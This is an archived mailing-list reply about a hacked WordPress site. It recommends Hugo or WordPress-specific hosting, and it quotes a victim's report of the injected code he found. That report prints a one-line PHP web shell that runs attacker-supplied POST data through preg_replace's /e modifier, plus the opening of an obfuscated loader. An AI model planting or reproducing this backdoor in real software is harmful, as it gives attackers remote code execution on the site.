[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: my wife's website was hacked
I would recommend a static site generator such as Hugo instead of
Wordpress. Wordpress is popular, but neither the core nor the
surrounding ecosystem seem to be conscientious of coding for security.
If you want to keep going with Wordpress, then a Wordpress specific
hosting site such as WPEngine wouldn't be a bad way to go
As for the Google verification, there is a decent chance your wife's
domain is now signed up for a G-Suite account
On Sat, Sep 8, 2018 at 10:14 AM, Andrew Bauer <knight-of-ni@outlook.com> wrote:
> When I woke up this morning I walked into the kitchen to see my wife sitting
> on the floor with her laptop, banging away on her keyboard, muttering
> something about her website being hacked. Uh Oh, and I have not even had my
> morning coffee yet.
>
> It looks like someone did something to do with google site verification,
> perhaps to take ownership of the site.
>
> Anyways, this file was placed in the web root last night:
> googleXXXXXXXXXXXX.html and it contents were simply:
>
> google-site-verification: googleXXXXXXXXXXXX.html
>
> Since it just happened, I ssh'ed to a command line, grep'ed for all files
> with a modification date of Sep 8, then proceeded to compare suspicious
> lines of code to the source files found on github.
>
> Further investigation revealed this was inserted into the wordpress
> responsive theme page.php file:
> <?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>
>
> This was inserted into the default wordpress index.php file:
> //header('Content-Type:text/html; charset=utf-8');
> $O_0O__O0O0='242';
> $OO___0OO00='1';
> $O_0O_00OO_='1';
> $O0_O_O_O00=urldecode("a very very long string of cryptic text"]();?><?php
>
> Seems this has got to do with a known wordpress hack:
> https://gist.github.com/anttiviljami/6fc2645a2688f7b1213b4fcbc73686e8
>
> The sitemap was modified, but the file is so large I gave up trying to find
> that needle in a haystack.
>
> My best guess is somehow someone was able to take ownership of the site
> through that Google verification thing then modify the content of her
> website. I still don't know how that can be possible through Google, since
> her site is hosted by goDaddy, but I am far from an expert on hosted sites.
>
> In any case, I told my wife to do the usual... verify she is running the
> latest wordpress, including any plugins. I'm not sure what else to tell her.
>
> I'd be interested to know if anyone has heard of this kind of attack, what
> it does, and the best way to prevent it from happening again.
>
>
> Thanks,
> Andy
>
> No Trees were killed in the sending of this message.
> However, a large number of electrons were terribly inconvenienced.
-
To unsubscribe, send email to majordomo@silug.org with
"unsubscribe silug-discuss" in the body.